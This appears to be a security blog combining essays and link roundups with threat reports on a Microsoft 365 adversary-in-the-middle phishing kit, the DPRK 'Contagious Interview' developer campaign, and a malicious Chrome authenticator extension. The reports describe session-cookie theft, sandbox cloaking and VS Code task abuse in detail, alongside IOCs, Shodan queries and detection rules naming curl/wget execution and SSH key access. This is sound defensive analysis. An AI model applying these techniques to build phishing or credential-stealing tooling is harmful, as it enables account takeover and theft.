Commentary followed by links to cybersecurity articles and resources that caught our interest internally.
In conversation recently, a fascinating question came up related to security operations work:
“Given the advisory nature of SecOps work, if there are dueling camps, how do you know where to fall when it’s your turn to speak?”
And the answer to that is simple: you fall back to your own values.
We deal with many shades of grey all the time, and that can be both exhausting and frustrating to have to navigate. The number of stakeholders never seems to wane, only wax, and at a certain level in your career you hit a point where you realize that, more often than not, your decisions will please one camp and disenfranchise at least one other. As an autistic I often default to viewing issues in binary terms, which doesn’t fit the world well. As a kid who went through his parents divorcing, working through complex corporate politics can trigger some existential-level anxiety in me. It’s not a fun time. And we don’t talk about any of it nearly enough.
But having built SecOps and Threat Intel programs from scratch, I learned one thing that will help more than any other once you’re pushing through hostile fog of war in threat hunting, detections engineering, and ultimately larger system architecture or policy decisions: consistency in your values eclipses any other political consideration. And far from making you a stick in the mud or keyboard warrior, what it does is provide a strong foundation from which to operate.
The first step in building a security program is defining the values under which it will operate. They’re guides, and can be flexible ones. But they are absolutely essential for building anything more than a paper-thin veneer of a program. Without fundamental values, the program may sway any which way the wind blows, and progressive accomplishments are harder to build upon. But by choosing the values that inform the program - especially SecOps - and communicating them from the first moments onward, you build not just a reliable framework for decision-making, but also trust.
And in security, of course, trust is critical.
In particular, you build the trust of users and stakeholders that team decision-makers are aligned and dependable, and the process weeds out arbitrary short-term thinking. By communicating this from the beginning you simultaneously establish expectations with partner organizations and create an understandable internal framework to fall back on in harder times. Like when your team is responsible for guidance that will make one executive’s day, and another exec’s naughty list. How do we decide where to fall? Well, that work might already be done - what are our values? How do they apply to the current moment?
Founding a security program on values provides another benefit: staying consistent to those values creates a kind of “compound interest of trust.” People know where you’re coming from even if your decision rankles them, and by your actions you build a narrative about your team as you go.
Start the story of your program with the values that will inform it. Tell the story of your program by staying consistent to them, and navigating the “Oh crap, how do we decide?” moments will become simpler. You’ve already defined the strategy; what remains is agreeing on the tactical level. Then evaluate, adapt, and move on to the next one.
infoblox - Amusing Numerology: Analysis of the Numbers in Domain Names - “The numeric component is not just noise appended to make domains unique. It encodes decisions baked into the generator at design time, decisions that stay constant regardless of which infrastructure cluster the domain lands on, which registrar was used, or when registration happened. That invariance, if detectable, makes the numeric component a particularly reliable provenance indicator for the cluster merge problem: determining whether multiple distinct clusters are actually produced by the same generator.” - Some people love trains. Some love shipping containers. Some people know everything about planes, or sports teams. Me? I love Infoblox research. Always scratches that data-rich itch right behind my ear.
flyingpenguin - Can Someone Please Explain Whether Cloudflare Blackmailed Canonical? - Sort of an ongoing question these days: Cloudflare selling some of the only viable protection against threats they themselves host or act as passthroughs and obfuscators for. A review of pDNS data shows that Cloudflare protected DDoS/booter service Beamed, which 313 Team used to disrupt Ubuntu services until Ubuntu signed on with Cloudflare. That’s not to mention, at least at the time this screenshot was taken, TeamPCP and Breachforums were using Cloudflare services to protect a site organizing a competition on who can breach the biggest supply chain:
ArsTechnica - Fired hacker twins forget to end Teams recording, capture own crimes - Guys. Pals. Brohams. Come on. Just hit the “Leave Meeting” button if you’re going to commit a crime. Please. Do it for the investigators, things like this just aren’t sporting. I’m like a T-rex in Jurassic Park. I want to hunt.
Twitter - THORchain incident update - “The leading theory is an exploit in the GG20 TSS implementation, allowing vault key material to leak over time. The attacker may have reconstructed the vault private key and executed unauthorized outbound txs” - One of the hardest things to defend against is a patient adversary. This vault key attack sounds really fun, too.
Knostic - New VS Code extensions attack campaign: SaassyCode - ManageRBLX & TrelloBlox - As usual, Knostic doing good work around AI matters. VScode extensions are probably one of the biggest problems in any enterprise that does development work and apparently the $80 billion that Microsoft has spent on Copilot isn’t enough to get the same results as Gadi Evron, Sounil Yu & company stacked in a silicon trenchcoat.
Research Papers and Reports
RIPE - Exploring Iran's Internet Shutdowns Using Cloudflare Radar - Short talk at 20 minutes, but absolutely fascinating topic, even with the network lighting back up at the moment. In the digital era, visibility is key to understanding actual impact in the world. I could’ve listened to a couple hours more of this, or even just a constant radio channel - a numbers station of Iranian IP blocks lighting up and going dark, or moving in and out of Iranian ASNs and M247.
USENIX - DNS Cache Poisoning Like it's 2006 - Well, since path traversal is popular this year, it makes sense that DNS cache poisoning would turn up too.
Verizon - 2026 Data Breach Investigations Report - The hallowed; the venerable; the yearly infosec coffee table book of horrors. Growing focus on vulnerability exploitation, among other trends.
Tools and Resources
Rivian - AI-SAST - An AI-driven static application security testing tool that’s probably worth putting through the motions if code analysis is your jam.
A sophisticated AiTM phishing kit bypassing traditional MFA to steal Microsoft 365 session cookies. Get the full breakdown and IOCs.
This report details the analysis of a fully operational Adversary-in-the-Middle (AiTM) credential-harvesting kit targeting Microsoft 365 and Entra ID identities. The attack involves a three-to-five stage funnel starting from financial, recruiting, and document related domain name themes. The funnels typically begin with an anti-analysis CAPTCHA gate to filter sandboxes. This is followed by a corporate email harvest stage that builds trust by dynamically rendering the victim's employer logo and filtering out personal email addresses. The final stage is a pixel-perfect, AiTM reverse proxy of the Microsoft sign-in page, which brokers the live authentication flow and successfully intercepts every credential, Multi-Factor Authentication (MFA) code (including Push, TOTP, and SMS), and post-authentication session cookie. Traditional MFA methods offer no defense against this pattern, as the kit captures the session cookie after the MFA challenge succeeds. Origin-bound authenticators such as FIDO2, passkeys, or Windows Hello for Business may be effective countermeasures.
The campaign has been active since at least December 2025. Evidence suggests the web kit has also been used to target major corporations that use customized authentication portals, as seen in tests against an @amazon.com address, and further domain pivots link the threat actor to fake login pages impersonating companies like Black Rock, Nvidia, Foxconn, Exxon, and Costco. Additionally, the kit includes a sandbox cloak/driver layer that uses JavaScript to evade automated analysis.
Details
Credential Harvest Adversary-In-The-Middle Kit
The captured kit is a credential-harvesting funnel that targets Microsoft 365 / Entra ID identities. It is configured as three sequential pages on two look-alike domains: a CAPTCHA-styled gate at rfg-documentfiles[.]com/, an "Identity Verification" page at rfg-documentfiles[.]com/auth/verify-access that filters out personal mail providers and harvests a corporate email, and a pixel-perfect clone of Microsoft's ConvergedSignIn page at login.documentfiles-rfq[.]com/oauth that operates as an adversary-in-the-middle (AiTM) reverse proxy against the real login.microsoftonline[.]com.
The first page exists to filter out sandboxes and URL scanners. The second page harvests a confirmed corporate email address and renders the victim's employer logo to build trust. The third page brokers the live Microsoft authentication flow: every credential, every MFA code, and the post-authentication session/refresh cookies are passed through attacker-controlled endpoints. Push, TOTP, and SMS MFA do not prevent compromise here, because the kit captures the issued session cookie after the challenge succeeds. Only origin-bound authenticators (FIDO2, passkeys, Windows Hello for Business) defeat this pattern.
Execution flow for rfg-documentfiles[.]com
Stage 1: Anti Analysis Gate
Landing Pages
Landing pages o commonly appeared as LinkedIn pages either directly as a ‘Redirecting, please wait…’ page that then redirects to a quick security check using a sliding puzzle piece, or the landing page itself is the security check.'
At this phase, there are multiple variations of next stage pages.
Stage 2: Corporate Email Harvest
Variation 1: An email input box that loads the icon and company name. Example inputting a fake Amazon email address:
Variation 2: A download file link that loads another page similar to variation 1
Clicking download button then loads https[:]//secure.rfq-quotationportal[.]com/oauth?tid=20350817-04103455-65209132-55023327
Variation 3: Additional human verification check that proceeds to a fake LinkedIn sign-in page
Stage 3: Adversary in the Middle reverse proxy of Microsoft sign-in
Entering a company email address then attempts an adversary-in-the-middle (AITM) with the specified company’s Microsoft organization sign-in page. In one case we used an @amazon.com address, and the resulting direction was to the Amazon employee midway-auth login page:
Other variations of the Stage 2 sites were also seen redirecting to Amazon’s employee IdP federate site at https[:]//idp.federate.amazon[.]com/api/saml2/dynamic-logical-idp/entra-prod-tenant/amazon-com/v1/sso
Notably, multiple other large companies had similarly customized auth redirects, suggesting the web kit has also been used to target other companies using their own managed employee authentication portals.
One test used a fake address with no real auth, so the Microsoft AITM attempt failed and the site redirected to the real midway-auth[.]amazon[.]com sign-in page. Otherwise, the site code appeared to be configured to steal the session.
Code Breakdown
Stage 1: Anti-Scan
The stage 1 sliding position puzzle piece
On drag-end, the verifier POSTs the slider position together with the navigator.webdriver flag. The server decides whether the next page is the real funnel or a benign decoy. A flagged automated client gets status:'bot' with a benign URL, and a real visitor gets status:'success' with the stage-2 URL. The client cannot tell the difference.
tage 1 also kicks off a web worker that computes a server-supplied seed/difficulty challenge. It likely serves two purposes: it consumes CPU on rapid-fire scanners, and it forces the verify token to come from a browser that actually executed JavaScript (JS) in a worker, which may filter out simple URL crawlers.
Stage 2: Corporate Email Funnel
Corporate email filter:
A hard-coded list of 25 free-mail domains is rejected by the client code. Only addresses outside that list are allowed to advance.
Dynamic logo render (Clearbit + S2 favicon):
On a passing email, the page paints the employer's logo next to the domain. The lookup is keyed on the email domain alone — Clearbit and Google return logos for any well-known company. This is the literal LogoKit primitive documented by Cyble, SecurityAffairs, and Resecurity.
Funnel:
The harvested email and the URL token are sent to /api/final-url, which returns a per-victim stage-3 URL. The email is on the attacker's server before any password is requested.
Stage 3:
$Config — every MS endpoint rewritten
This is the AiTM mechanic in one object. In a legitimate sign-in, these URLs all resolve under the real login.microsoftonline.com. However, on the attacker’s site, every authentication-bearing endpoint points at the attacker host. Microsoft's own JS bundles (loaded from the real aadcdn.msauth.net for parity) read these URLs at runtime and POST credentials/MFA codes to them.
The three URLs that matter most for credential capture are urlPost (the password lands here), urlGetCredentialType (lets the attacker steer the federation/passkey decision so the user is not redirected to a real IdP), and urlGetOneTimeCode (the MFA OTP). The redirect_uri on www.documentfiles-rfq[.]com/landingv2 is where the post-auth OAuth code / id_token is delivered.
The two endpoints that matter most for harvest:
urlPost: Microsoft's converged login JS (loaded from aadcdn.msauth.net) submits the password to whatever $Config.urlPost says. With this rewrite, every typed password is POSTed to the attacker's server first.
urlGetCredentialType: controls how Microsoft decides if the user is federated, has a passkey, or needs a password. Owning this endpoint lets the attacker steer every UI branch (and prevents a redirect to a real federation IdP that would expose the proxy).
urlGetOneTimeCode: the field where the user types the SMS / authenticator OTP. Forwarded straight to the attacker, who replays it to the real Microsoft within the same proxied session and pockets the resulting ESTSAUTH / ESTSAUTHPERSISTENT cookie.
The web kit hijacks Microsoft's well-known Office Home client_id but sends the post-auth code/id_token to www.documentfiles-rfq.com/landingv2. This is a strong signature of an AiTM consent-grant phish operating against the multi-tenant common endpoint.
The web kit body ends with two extra script tags that are not present in the real Microsoft page:
Both scripts reuse Microsoft's own CSP nonce (0FilRYh2jmgi_Id99Cb0Hw) — a strong signal that the attacker proxy reads the real CSP nonce from the upstream response and inlines it into its own injected tags so the browser executes them. The path prefix /s/<sha256>/<sha256>.js matches content-addressed payload hosting common in modern phish kits.
Sandbox cloak / driver
Tab-title randomisation from a word list: Welcome, Secure, Access, Portal, Login, Account, Verify, Sign In. Likely intended as a low-effort signature evasion against browser-history / EDR string matches that look for fixed phishing titles.
i0116 and idSIButton9 are the well-known DOM IDs of Microsoft's email field and "Next" button, suggesting the script is purpose-built to drive Microsoft's sign-in UI.
Auto-typing any @google.com address and clicking Next on page load is most consistent with a cloak / sandbox-detection layer: analyst sandboxes that detonate the URL will see Microsoft return a benign "we couldn't find an account with that user name" outcome (because google.com isn't an Entra-managed tenant), causing the page to look like an accidental misconfiguration rather than a phish. However, using @amazon did work and triggered the next stage, likely because they do have a Microsoft managed tenant.
Cloak script
Two scripts are appended to the end of <body>; both reuse Microsoft's CSP nonce. They randomize the page title from a fixed eight-word list, then auto-types the victim provided email address into Microsoft's i0116 email input and clicks the idSIButton9 "Next" button on a 500 ms interval.
The script is a sandbox-detection / cloak layer. A sandbox that detonates the URL without first passing stages 1–2 will see the script auto-submit the victim’s provided email address, against which Microsoft returns "we couldn't find an account with that user name." This makes the page look like an accidental misconfiguration rather than a phish.
Domain Registration Pivots
Common Website Title: Security Check | Verification Required
The phishing campaign appears to go back to 2025-12, with common domain name themes around job recruitment, investment, finance, business, and documents.
Sample Shodan Queries:
http.html:"To continue, please solve this puzzle so we know you're a real person"
http.title:"Security Check | Verification Required" http.html:"Professional Network"
http.html:"puzzle-container" http.html:"bg-canvas" http.html:"piece-canvas" http.html:"slider-handle"
http.html:"id=\"bg-canvas\" width=\"300\" height=\"150\"" http.html:"id=\"piece-canvas\" width=\"50\" height=\"50\""
SOA Pivot Rabbithole:
One of the identified domains from the closely aligned domain registration pivot was capivest[.]top, which has an SOA email itzfahim194[@]gmail[.]com. The same SOA email is tied to 94 domains with some overlapping domain name themes going back to mid-2025. Additionally, several domains were observed hosting fake login pages for multiple corporations including Black Rock (black-rock1[.]top), Nvidia (nvidiatechnolodgy[.]top), Foxconn (foxconn-n.net[.]ng), Exxon (exxon-ieo[.]top), Costco (costc0[.]top) and others. These 94 domains are subsequently linked by unique registrant names and other identifiable SOA emails to over 200 domains.
Many of the domains are seen to host websites with login pages and suspicious characteristics sampled below:
What was captured appears to be a fully working AiTM credential-harvest kit aimed at Microsoft 365 / Entra ID and fronted by a CAPTCHA cloak and a corporate-email filter, active since December 2025.
Systems thinking, biolistics, and the danger of mop-up science in infosec — plus this month's reading on ransomware, RPKI exploits, cPanel, and LLM pollution.
The more I understand about the overall threat environment, the less I know about the overall threat environment.
The more I understand about the interconnected systems in the overall threat environment, the more I understand about defense.
If you query the right kind of security nerd, roughly 10% of infosec practitioners by my anecdotal count, you will find not just someone who learned about Systems Thinking and keeps it in the mental toolbox for the right moment, but someone who the topic is formative for, someone who dived deep into the nature of different types of systems, and how similar and different systems can interact with each other. I’ve found it goes well beyond computer systems - we have colleagues who have studied deeply on natural or artificial ecosystems, on the vast array of biological systems at hand, on industrial production systems and complex gas processes. Governance systems familiarity is a hit due to its proximity to compliance systems. Firearms systems are a regular special interest of American security practitioners.
The lessons we learn from studying disparate systems often come to fruition in a completely unrelated discipline - or one that appears unrelated, anyway. Or overlaps serendipitously with a current puzzle or problem to overcome. It’s one of the reasons that Bioanalytics graduates are highly sought-after as business data analysts.
In the early 1980s as genetic engineering took some of its first truly artificial strides, one of the primary problems to overcome was how to introduce a desired gene into a cell experimentally without engaging with the larger multicellular organism - breeding the gene in, in other words. Then some mad scientist decided to coat particles of hard metal with genetic material, sprinkle them on a projectile, and fire it straight into a cell with a .22 caliber bullet’s worth of gunpowder.
Voila. The entire field of biological ballistics - or biolistics - was born. Usage continues to the present day. Some scientist, somewhere, is firing live ammo (probably at plant cells) in order to induce genetic transformation.
The sheer brute novelty of this method continues to amaze me.
“Normal science,” wrote the philosopher Thomas Kuhn in his ironically paradigmatic book The Structure of Scientific Revolutions, “the activity in which most scientists inevitably spend almost all their time, is predicated on the assumption that the scientific community knows what the world is like.”
As an industry, we largely seem to be convinced, or are at least trying to convince others, that we know what the world is like. Often to my embarrassment, I can only say that I’ve never been confident about knowing what the world is like, whether we’re talking about life in general or cybersecurity in particular. That internal posture of curious insecurity shapes not only my reticence, but also my expansive experience of the possible.
And I often worry that as a sort of industrial science, we really have convinced ourselves that we know what the world is like, and most of our time is wasted dawdling in mop-up operations. All available incentives push us toward the middle of information security as a science rather than the edges. Most leave us tired at the end of the day, without the energy or resources to push imaginative boundaries.
What happens if I start looking at each problem not from the perspective of someone who’s supposed to know what the world is like already and simply be reactive to it, but from the perspective of the madman that fired the first gene-coated bullet into a cluster of cells and then carefully watched for signs of transformation to appear?
Podcasts
Lawfare - The Shadowy World of Ransomware with Professor Anja Shortland - The interview was strong enough that I insta-ordered Shortland’s book “Dark Screens” - so definitely worth listening to. Worth keeping in mind it’s from a political economy standpoint, in order to set expectations, but the more perspectives we have on this the better.
Articles
FBI/IC3 - Cyber-Enabled Strategic Cargo Theft Surging - Between this and the use of insecure webcams to better target kinetic strikes, getting more and more interesting to see how perverse incentives in the technology sphere lead to dire consequences in meatspace.
Mxsasha - Taking down a European network with a TLS certificate: my RIPE NCC RPKI exploit chain - “A single shared session cookie and missing CSRF protection allowed me to make authenticated changes to the RPKI Dashboard and RIPE Database, which control routing configuration for networks from Europe, the Middle East, and Central Asia.” - Clever research that continues to show how paper-thin our protections are at a global scale.
NTPpool - DNS configuration tampering on one of our GeoDNS servers - “We found that a volunteer who provided hosting for one of our GeoDNS servers used their access to manipulate DNS zone weights for the NTP Pool service domain.” - Fascinating bit of malice here. Timing can do weird things to computers and other equipment, so an attack on the NTP pool can have widesweeping, unanticipated repercussions. On my to-do list to start looking more deeply at hypothetical NTP attack impacts now.
Quad9 - Negative Trust Anchors - I had never heard of Negative Trust Anchors before, but came across it as a result of the DENIC .de DNSSEC debacle yesterday. Really fascinating mechanism with very complicated incentives and consequences. Also, I very much appreciate how cautiously Quad9 approaches it.
Twitter - eth[.]limo DNS hijack post-mortem - Credit where is due, looks like the eth[.]limo folks set things up right, with services reliant on DNSSEC, so when DNS was compromised, the blast radius was severely limited.
BIML - Recursive Pollution and Model Collapse Are Not the Same - “The number one risk in LLMs today is recursive pollution. This happens when an LLM model is trained on the open Internet (including errors and misinformation), creates content that is wrong, and then later eats that content when it (or another generation of models) is trained up again on a data ocean that includes its own pollution. Wrongness grows just like guitar feedback through an amp does.” - A good, quick post about an important difference in LLM training risks, and given the abuse of LLMs for influence operations lately and subsequent re-ingestion of that material by LLM scrapers, something that looks to be a clear possibility, if not probability.
FBI - 2025 Internet Crime Report - (direct PDF link) - 26% increase in known losses from 2024 feels like a bad omen.
Europol - Internet Organised Crime Threat Assessment (IOCTA) 2026 - “The abuse of the Domain Name System (DNS) allows criminals to effectively exploit the time period between domain registration and LE intervention.” - Lots of good information here, but unsurprisingly, it continues to always be DNS. Of the interesting trends we’ve seen lately, dead drop DNS C2s are probably at or near the top of the list.
Analyze the DPRK "Contagious Interview" campaign targeting developers. Get technical deep-dives into VS Code task abuse, Node.js malware obfuscation, and a full Sigma/EDR detection pack to defend your CI/CD pipeline and identity perimeter.
Executive Summary
The DPRK “Contagious Interview” campaign (LAZARUS) represents a mature evolution of intrusion tradecraft in which adversaries weaponize legitimate hiring workflows to induce execution of malicious code within trusted developer environments. Unlike traditional phishing or exploit-driven compromise, this model collapses initial access, execution, and credential harvesting into a single interaction, leveraging social engineering and professional trust rather than technical vulnerability.
The campaign targets software developers and technical personnel through fraudulent job interview processes conducted across platforms such as GitHub, LinkedIn, and direct messaging channels. Victims are instructed to clone and execute repositories presented as coding challenges, which contain embedded payloads designed to harvest credentials, extract session tokens, and enable rapid lateral movement into enterprise environments.
This approach aligns structurally with identity-first intrusion models observed in Muddled Libra, but is distinct in its focus on developer ecosystems and supply chain adjacency. The result is a high-speed, low-noise intrusion methodology capable of bypassing multi-factor authentication (MFA), evading endpoint detection, and enabling immediate access to high-value systems including source code repositories, CI/CD pipelines, and cloud infrastructure.
Operational Model and Attack Flow
The campaign is best understood as a controlled execution pipeline in which the adversary externalizes the execution step to the victim.
The attack sequence begins with targeted outreach masquerading as recruitment activity. Adversaries establish credibility through impersonation of recruiters or companies, often leveraging realistic job descriptions and communication patterns. Once engagement is established, the victim is invited to complete a technical assessment.
This assessment serves as the delivery mechanism. The victim is instructed to clone a repository and execute code locally, often framed as a debugging or build task. Within this repository, malicious logic is embedded either directly in source files, dependencies, or development tooling configurations.
A key innovation is the abuse of Visual Studio Code task automation. Malicious .vscode/tasks.json configurations trigger execution automatically upon opening the project, eliminating the need for explicit user action beyond normal workflow behavior.
Once executed, the payload performs environment-aware collection. This includes extraction of:
Browser session tokens
Git credentials and access tokens
SSH keys
Cloud credentials (AWS, Azure, GCP)
API tokens (GitHub, Slack, CI/CD systems)
The compromise phase is immediately followed by exploitation. Adversaries pivot into enterprise environments using harvested credentials, often achieving access to repositories, cloud control planes, or internal systems within minutes. This mirrors the rapid escalation observed in Muddled Libra operations, where domain-level compromise can occur in under an hour .
Tradecraft and Technical Characteristics
Human-Centric Execution
The defining characteristic of this campaign is the replacement of exploit delivery with induced execution. The victim executes the payload voluntarily within a trusted context, rendering many traditional security controls ineffective.
Malware Minimalism and Obfuscation
While malware is present, it is deliberately disguised as legitimate development artifacts. Payloads are frequently implemented in:
Node.js
Python
Golang
Execution is often fileless or memory-resident, and code is embedded within non-obvious file types such as fonts or images to evade detection.
Abuse of Development Tooling
The campaign exploits developer tooling as an execution substrate:
VS Code task automation (runOn: folderOpen)
npm package dependencies (e.g., malicious packages like jsonwebauth)
Build scripts and test frameworks
This creates a supply-chain-adjacent effect in which the developer workstation becomes the initial compromise node.
Cloud and Web-Based Staging Infrastructure
Payload delivery and staging frequently leverage:
Vercel-hosted endpoints
JSON storage services
Paste-based staging platforms
These services provide ephemeral, low-friction infrastructure that blends with legitimate traffic.
Credential-Centric Objectives
The campaign prioritizes identity artifacts over persistence mechanisms. Credential theft enables:
Immediate lateral movement
Access to privileged systems
Potential downstream supply chain compromise
Infrastructure and Reuse Patterns
Unlike traditional campaigns that rely on stable infrastructure, this operation exhibits distributed and disposable infrastructure usage. However, several recurring patterns provide actionable detection opportunities:
Use of JSON storage platforms for payload staging
Repeated use of Vercel-hosted delivery endpoints
Paste-based intermediate payload retrieval
Administration via VPN services (e.g., Astrill VPN)
Geographic clustering of operator activity (observed in China-based IP space)
The infrastructure strategy prioritizes resilience and deniability over persistence.
Strategic Assessment
The Contagious Interview campaign represents a structural shift in intrusion methodology:
Collapse of the Kill Chain
Stages that are traditionally independent – delivery, exploitation, and execution – are merged into a single user-driven action. This reduces detection windows and eliminates reliance on technical vulnerabilities.
Identity as the Primary Attack Surface
The campaign reinforces a broader trend in which identity systems, rather than endpoints or networks, represent the primary control plane for attackers.
Developer Ecosystem as a High-Value Target
By targeting developers, adversaries gain access to:
Source code repositories
Software supply chains
Cloud infrastructure
Organizational secrets
This creates second-order effects, enabling compromise of downstream organizations.
Convergence with Ransomware and Access Brokerage
Given the alignment with identity-first intrusion models, it is highly likely that access obtained through this campaign is monetized via:
Initial access brokerage
Ransomware deployment
Data exfiltration and extortion
This mirrors the operational ecosystem observed in Muddled Libra and related clusters.
Defensive Implications
Detection and mitigation require a shift away from traditional indicators toward behavioral and workflow-based monitoring:
Monitoring execution patterns within development environments
IF
ParentProcess = Code.exe
AND
ChildProcess IN (cmd.exe, powershell.exe, bash, sh)
AND
CommandLine CONTAINS (curl OR wget OR http)
WITHIN 2 minutes
AND
NetworkConnection TO (vercel.app OR jsonkeeper OR npoint OR pastebin)
THEN
Alert: Contagious Interview Execution Chain
Severity: CRITICAL
7. Token / Credential Exfil Behavior
Sigma (generic but tuned)
title: Suspicious Access to Credential Stores After VS Code Execution
id: cti-post-execution-credential-access
status: experimental
logsource:
category: process_creation
detection:
selection_parent:
ParentImage|endswith:
- '\Code.exe'
selection_child:
Image|endswith:
- '\chrome.exe'
- '\firefox.exe'
- '\msedge.exe'
- '\ssh.exe'
timeframe: 5m
condition: selection_parent and selection_child
level: medium
8. Git / SSH Key Access Spike
EDR heuristic
Detect:
- Access to ~/.ssh, id_rsa, id_ed25519
- Followed by outbound connection within 60 seconds
- Parent chain includes Code.exe or node.exe
Flag as:
Credential Harvesting via Developer Workflow
9. CI/CD Pivot Detection
Sigma (optional enterprise detection)
title: Unusual GitHub Token Usage from Developer Endpoint
id: cti-github-token-abuse
status: experimental
logsource:
category: network_connection
detection:
selection:
DestinationHostname|contains:
- 'api.github.com'
anomaly:
UserAgent|not_contains:
- 'git'
condition: selection and anomaly
level: medium
10. High-Fidelity Hunt Query (EDR / SIEM)
Use this as a compound hunt:
(
ParentProcess = Code.exe
AND ChildProcess IN (cmd, powershell, bash)
)
OR
(
Process = node
AND CommandLine CONTAINS (.woff OR .svg OR .jpeg)
)
OR
(
Process = Code.exe
AND NetworkDomain IN (vercel.app, jsonkeeper.com, npoint.io)
)
Detection Philosophy (Important)
This pack deliberately avoids over-reliance on static IOCs because:
Payloads are ephemeral
Infrastructure rotates
Code is frequently modified
Instead, it focuses on execution invariants:
IDE-driven execution (rare in benign workflows)
Shell invocation from developer tools
Non-standard file execution via Node
Immediate outbound network activity
Priority Signals (What to Alert On First)
If you need triage prioritization:
Highest confidence
Node executing .woff / .svg
VS Code → shell → network chain
Medium confidence
jsonwebauth / lserver.js presence
Vercel + developer workstation correlation
Lower (context required)
Function.constructor usage
GitHub API anomalies
Analytical Alignment
This detection model aligns with the same operational compression observed in Muddled Libra:
rapid execution post-access
minimal malware footprint
identity/token theft as primary objective
The Unit 42 dataset reinforces this shift toward speed and identity abuse over persistence, reducing the utility of traditional detection layers .
Appendix D: MITRE ATT&CK Mapping
ATT&CK Techniques Most Strongly Associated with the Campaign
T1566.003 – Phishing: Spearphishing via Service Recruiter outreach and lure delivery through LinkedIn, code-hosting platforms, and other online services.
T1566.002 – Phishing: Spearphishing Link Victims are directed to malicious repositories, staged assessments, or hosted payload locations.
T1204.001 / T1204.002 – User Execution Victims voluntarily execute code as part of an “interview” or “technical test.”
T1059.007 – Command and Scripting Interpreter: JavaScript Malicious npm / Node execution is central to multiple documented chains.
T1059.006 – Command and Scripting Interpreter: Python PyLangGhost and related scripting components support cross-platform execution.
T1059.004 – Command and Scripting Interpreter: Unix Shell Shell-based staging and download logic are documented in IDE task-abuse chains.
T1036 – Masquerading Malicious content is disguised as normal interview code, repositories, tasks, or packages.
T1027 – Obfuscated Files or Information Obfuscated JavaScript and disguised non-code assets are part of the execution chain.
T1555 / T1555.003 – Credentials from Password Stores / Web Browsers Theft of browser credentials and related local secrets is a recurring objective.
T1005 – Data from Local System Collection of local credentials, wallet information, and developer artifacts from endpoints.
T1071 – Application Layer Protocol C2 and staging are conducted over ordinary web traffic and cloud services.
T1567 – Exfiltration Over Web Service Use of cloud-hosted platforms and web services for staging and likely data movement.
Analysis of the persistent AIFrame campaign: A fake Google Authenticator Chrome extension and 6+ related apps use "deploy clean, update dirty" tactics to steal 2FA credentials and inject malicious iframes. Learn how this operation bypasses Google’s security reviews.
A Chrome extension impersonating Google's Authenticator application was identified as part of an ongoing malicious campaign active since at least early 2026. The extension appears to use Chrome's localization system and skeleton code to bypass security reviews. Despite its functional appearance, it requests broad, unnecessary permissions and contains "dormant infrastructure”. This suggests a staged deployment model, where the extension remains trustworthy on the surface while maintaining the architectural groundwork to deliver a malicious update without requiring further permission approvals from the user or the store.
This extension is linked to at least six others through a shared developer front, two of which already carry fully operational malicious payloads. These extensions utilize hidden iframes to inject attacker-controlled content into every webpage, deploy fraudulent paywalls for free services, and maintain bidirectional communication with C2 servers. The infrastructure maps directly to the AiFrame campaign, which reportedly compromised over 260,000 users from 2025 to present. This current operation marks a continued evolution of that threat, specifically implementing additional steps to bypass detection and the apparent targeting of security-conscious individuals who may inadvertently hand over their sensitive two-factor authentication (2FA) credentials to the attackers.
Details
2FA Authenticator - generate secure codes in your browser. Fast, offline two-factor authentication for all your accounts. Over 30,000 downloads. Published on 2026-04-02.
Lure site: authenticator[.]sh
The site links to
https[:]//chromewebstore.google[.]com/detail/2FA/ebhcbenbgjmaebpgbldimndmfomjmphd?utm_source=site (A fake Authenticator)
https[:]//github[.]com/google/google-authenticator (the real Google Authenticator)
The Extension
The authenticator app has severely over-privileged manifest permissions. Namely, a TOTP generator has zero need to access web page content.
"host_permissions": [
"<all_urls>" ],
The permissions may enable the actor to read/modify content on every website; inject content scripts into any page; intercept form data, cookies, session tokens or overlay phishing pages via iframes. Though the <all_urls> host permission is not used anywhere in the initial downloaded codebase, no content scripts are declared or programmatically registered. Its presence is likely a pre-staged capability for a future malicious update, a common strategy to bypass Chrome Web Store security checks, sometimes described as a deploy clean, update dirty strategy.
Within the code for the downloaded extension there is a file “background/service-worker.js”, that handles the installation and uninstallation. Its code is minified, the following is a de-minified showing of its contents.
Here we see a google form is used to track app uninstallations
References to the whitelab[.]studio domain are also seen: https[:]//authenticator.whitelab[.]studio/${lang}/welcome
The installation behavior
Opens https://authenticator.whitelab[.]studio/{locale}/welcome in a new tab immediately on install
Detects the user's language and selects from 20 supported locales
Phones home to the extension owner’s infrastructure, confirming installation and storing the user's locale preference
There is a dormant message listener “chrome.runtime.onMessage.addListener((s, t, e) => !0);” that would accept all messages from any context (popup, content scripts, other extensions). This is likely a skeleton hook. The service worker could act as a relay between injected content scripts and a C2 server. This empty listener would then be the scaffolding for that relay. A future update to the service worker or the addition of a content script would activate it without requiring a manifest change. Combined with the pre-staged <all_urls> permission, this is a fully prepared malware delivery mechanism awaiting activation.
The Submitter
The app was submitted by email domain airnetic[.]space, its welcome page is sourced from authenticator.whitelab[.]studio.
authenticator.whitelab[.]studio
The site has links to multiple other Chrome Web Store extensions
Category
Name
Description
URL
Productivity
AI Chat to PDF
Export your AI chat conversations to beautifully formatted PDF files. One click, clean output.
Of those extensions linked from the whitelab domain, AI Agent (originally "Google Gemini") fdlagfnfaheppaigholhoojabfaapnhb, was reported by Layer X Security in February 2026. It was described as a “coordinated campaign of Chrome extensions posing as AI assistants for summarization, chat, writing, and Gmail assistance” active since 2025 that used injected iFrames and intended to steal business data, browsing history and credentials. A different activity report by Koi Research describes a similar campaign dubbed the AI Frame campaign occurring more recently that notably also used Github payloads, though no direct indicator links were observed.
Airnetic[.]space was also used as an alias gmail address airnetic.space[@]gmail[.]com for multiple AI Frame campaign extensions. A domain of the same name was registered on 2025-03-02, but it is unknown if the domain is related to this extension or actor.
Extension Name
Extension ID
2FA (Featured on Chrome Web Store)
ebhcbenbgjmaebpgbldimndmfomjmphd
AI Sidebar Chrome (Using Deepseek Logo)
djhjckkfgancelbmgcamjimgphaphjdl
ChatGPT Sidebar
llojfncgbabajmdglnkbhmiebiinohek
The infrastructure and domains used by the actor continue to be used despite the extensive public reporting by multiple security companies. Domains still resolve to the lure sites, including those hosted on Vercel and Amazon. Extensions in the Google Web Store also continue to be available with a few identified exceptions.
Whitelab’s AI Chat to PDF Extension
Looking at other extensions from the whitelab[.]studio domain:
Name: AI Chat to PDF
Publisher: ai-chat-to-pdf[.]com
Publisher Email: airtronics307[@]gmail[.]com
Google Web Store ID: nlfkaldinolmacagmiddfpnfaeclfibn
Description: Instantly export your Gemini chats to PDF: smart conversion for perfect results.
C2: appbox[.]space
The extension itself is even more overprivileged and malicious than the authenticator variant.
